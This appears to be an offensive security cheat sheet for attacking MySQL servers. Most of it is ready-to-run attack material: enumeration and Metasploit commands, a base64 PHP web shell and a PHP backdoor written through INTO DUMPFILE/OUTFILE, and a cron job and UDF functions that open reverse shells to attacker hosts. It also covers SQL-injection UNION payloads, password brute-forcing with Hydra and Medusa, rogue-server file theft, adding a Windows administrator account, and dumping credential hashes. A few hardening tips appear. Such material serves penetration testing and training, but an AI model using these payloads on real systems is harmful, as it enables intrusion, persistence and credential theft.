MySql - Port 3306

Basic info

MySQL can be described as an open source Relational Database Management System (RDBMS) that is available at no cost. It operates on the Structured Query Language (SQL), enabling the management and manipulation of databases.

Default port: 3306

How to connect?

For local:

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

For remote

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Enumeration

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>

#msfconsole
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Write any binary data

Once you've used CONVERT(unhex(...), BINARY) or CONVERT(from_base64(...), BINARY) to generate binary data in MySQL, you can leverage it to write files directly to the filesystem using INTO DUMPFILE. This is especially powerful when you have FILE privileges in MySQL. For example, to drop a simple PHP web shell, you could run:

SELECT CONVERT(from_base64('PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+'), BINARY)
INTO DUMPFILE '/var/www/html/shell.php';

That writes a PHP shell accessible at http://target/shell.php?cmd=id.

You can also write binary payloads (e.g., .so or .dll) like this:

SELECT CONVERT(unhex('7f454c46020101000000000000000000...'), BINARY)
INTO DUMPFILE '/tmp/libexploit.so';

Or write a malicious cron job:

SELECT "* * * * * root bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'\n"
INTO DUMPFILE '/etc/cron.d/pwned';

These commands let you pivot from database access to full system compromise, persistence, or remote code execution, all without a traditional shell.


MySQL commands

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

MySQL Permissions Enumeration

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

Credential Discovery

If you didn’t get lucky with anonymous login, time to brute.

🧾 Default Credentials

Common ones to try:

  • root:root

  • root:toor

  • admin:admin

💣 Brute Force with Hydra

hydra -L users.txt -P passwords.txt mysql://<target_ip>

⚔️ Medusa Alternative

medusa -h <target_ip> -u root -P passlist.txt -M mysql

Reading Arbitrary Files via MySQL Client Misuse

One lesser-known but powerful technique involves abusing the LOAD DATA LOCAL INFILE feature in MySQL/MariaDB. This command, when used with the LOCAL keyword, instructs the client (not the server) to read a local file and send it to the database server.

If an attacker can trick a victim's MySQL client (like the mysql CLI or an app with misconfigured DB connections) into connecting to a malicious server, that rogue server can request the client to read and send any local file — leading to arbitrary file disclosure.

🔍 Vulnerable Command Example

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n';

Note the keyword LOCAL — this is what triggers the client-side file read. If LOCAL is omitted, and MySQL is hardened, you may see this error:

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

This behavior can be exploited by running a rogue MySQL server and luring clients into connecting to it (e.g., through phishing, SSRF, or misconfigured dev tools). You can find a working proof of concept here: 👉 Rogue MySQL Server PoC

Further reading:


Privilege Escalation in MySQL

🔎 Check MySQL Service User

It’s especially dangerous if MySQL is running as root, as that can lead to full system compromise. Check who runs MySQL:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

⚙️ Dangerous MySQL Configs to Look For

In /etc/mysql/my.cnf or mysqld.cnf, pay attention to:

  • user: Account running MySQL (should NOT be root)

  • secure_file_priv: If unset, file import/export is unrestricted

  • admin_address: Exposed MySQL interfaces

  • debug, sql_warnings: Might expose sensitive info in logs


🔐 Extracting User Credentials and Privileges

-- Current session user
SELECT USER();

-- List all users with privileges
SELECT user, password, create_priv, insert_priv, update_priv, alter_priv, delete_priv, drop_priv FROM mysql.user;

-- Full dump with command-line
mysql -u root -p -e "SELECT * FROM mysql.user;"

👤 Create a New Privileged User

CREATE USER 'test' IDENTIFIED BY 'test';
GRANT SELECT, CREATE, DROP, UPDATE, DELETE, INSERT ON *.* TO 'test'@'%' IDENTIFIED BY 'mysql' WITH GRANT OPTION;

💻 Get a Local Shell via MySQL

\! sh

Useful in cases where your client has interactive capabilities.


🧬 Privilege Escalation via Malicious Shared Library (UDF Injection)

If MySQL is running as root or a privileged user, you can execute OS commands by injecting a User Defined Function (UDF) from a compiled .so or .dll.

📦 Compile UDF Library on Target (Linux)

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

🧪 Inject Library via SQL

USE mysql;
CREATE TABLE npn(line BLOB);
INSERT INTO npn VALUES (LOAD_FILE('/tmp/lib_mysqludf_sys.so'));
SHOW VARIABLES LIKE '%plugin%';

-- Example path:
SELECT * FROM npn INTO DUMPFILE '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';

-- Create function
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';

-- Run commands
SELECT sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
SELECT sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

🪟 Windows Variant

USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn VALUES (LOAD_FILE('C://temp//lib_mysqludf_sys.dll'));
SHOW VARIABLES LIKE '%plugin%';
SELECT * FROM npn INTO DUMPFILE 'C://Windows//System32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

🔑 Extracting MySQL Passwords from the Filesystem

If you have file system access, here are some critical files to check:

📂 /etc/mysql/debian.cnf

Contains plain-text login credentials for debian-sys-maint:

cat /etc/mysql/debian.cnf

💾 /var/lib/mysql/mysql/user.MYD

Holds raw MySQL user hashes — extract like this:

grep -oaE "[-_.a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

This can give you credentials even without database access.


Enabling logging

You can enable logging of mysql queries inside /etc/mysql/my.cnf uncommenting the following lines:

Useful files

Configuration Files

  • windows *

    • config.ini

    • my.ini

      • windows\my.ini

      • winnt\my.ini

    • <InstDir>/mysql/data/

    • unix

      • my.cnf

        • /etc/my.cnf

        • /etc/mysql/my.cnf

        • /var/lib/mysql/my.cnf

        • ~/.my.cnf

        • /etc/my.cnf

  • Command History

    • ~/.mysql.history

  • Log Files

    • connections.log

    • update.log

    • common.log


Default MySQL Databases and Tables

When MySQL or MariaDB is freshly installed, it comes with a set of default databases and system tables that play critical roles in authentication, configuration, and user management. The most important of these is the mysql database, which stores core internal data used by the MySQL server. Inside it, you'll find sensitive tables like:

  • mysql.user – Stores usernames, password hashes, and global privileges

  • mysql.db – Defines database-level privileges

  • mysql.tables_priv, columns_priv – Fine-grained access control over specific tables or columns

  • mysql.procs_priv – Procedure-specific privileges

  • mysql.roles_mapping – Role-based access configuration (in newer versions)

These tables are often the first target during post-exploitation. By querying or dumping them, an attacker can extract valid user accounts, escalate privileges, or even inject backdoor users. For example:

SELECT user, host, authentication_string FROM mysql.user;

Accessing these default tables is essential for both privilege auditing and credential extraction, and manipulating them can allow the attacker to create new admin accounts, escalate permissions, or disable security controls. Always monitor access to the mysql database and restrict usage to only highly trusted administrators.

ALL_PLUGINS

APPLICABLE_ROLES

CHARACTER_SETS

CHECK_CONSTRAINTS

COLLATIONS

COLLATION_CHARACTER_SET_APPLICABILITY

COLUMNS

COLUMN_PRIVILEGES

ENABLED_ROLES

ENGINES

EVENTS

FILES

GLOBAL_STATUS

GLOBAL_VARIABLES

KEY_COLUMN_USAGE

KEY_CACHES

OPTIMIZER_TRACE

PARAMETERS

PARTITIONS

PLUGINS

PROCESSLIST

PROFILING

REFERENTIAL_CONSTRAINTS

ROUTINES

SCHEMATA

SCHEMA_PRIVILEGES

SESSION_STATUS

SESSION_VARIABLES

STATISTICS

SYSTEM_VARIABLES

TABLES

TABLESPACES

TABLE_CONSTRAINTS

TABLE_PRIVILEGES

TRIGGERS

USER_PRIVILEGES

VIEWS

INNODB_LOCKS

INNODB_TRX

INNODB_SYS_DATAFILES

INNODB_FT_CONFIG

INNODB_SYS_VIRTUAL

INNODB_CMP

INNODB_FT_BEING_DELETED

INNODB_CMP_RESET

INNODB_CMP_PER_INDEX

INNODB_CMPMEM_RESET

INNODB_FT_DELETED

INNODB_BUFFER_PAGE_LRU

INNODB_LOCK_WAITS

INNODB_TEMP_TABLE_INFO

INNODB_SYS_INDEXES

INNODB_SYS_TABLES

INNODB_SYS_FIELDS

INNODB_CMP_PER_INDEX_RESET

INNODB_BUFFER_PAGE

INNODB_FT_DEFAULT_STOPWORD

INNODB_FT_INDEX_TABLE

INNODB_FT_INDEX_CACHE

INNODB_SYS_TABLESPACES

INNODB_METRICS

INNODB_SYS_FOREIGN_COLS

INNODB_CMPMEM

INNODB_BUFFER_POOL_STATS

INNODB_SYS_COLUMNS

INNODB_SYS_FOREIGN

INNODB_SYS_TABLESTATS

GEOMETRY_COLUMNS

SPATIAL_REF_SYS

CLIENT_STATISTICS

INDEX_STATISTICS

USER_STATISTICS

INNODB_MUTEXES

TABLE_STATISTICS

INNODB_TABLESPACES_ENCRYPTION

user_variables

INNODB_TABLESPACES_SCRUBBING

INNODB_SYS_SEMAPHORE_WAITS



Last updated

Was this helpful?